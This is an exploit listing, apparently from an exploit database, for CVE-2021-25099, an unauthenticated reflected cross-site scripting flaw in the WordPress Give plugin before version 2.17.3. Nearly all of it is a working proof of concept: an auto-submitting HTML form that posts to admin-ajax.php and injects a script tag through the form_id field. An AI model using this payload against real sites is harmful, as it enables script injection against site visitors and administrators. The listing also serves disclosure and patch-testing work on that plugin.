Exploit for Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting CVE-2021-25099

Name: Exploit for Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting CVE-2021-25099
Rating: 5 (131 reviews)

2022-01-18 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:87A64B27-23A3-40F5-A3D8-0650975FEE6F
As an unauthenticated user:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="give_checkout_login" />
      <input type="hidden" name="form_id" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>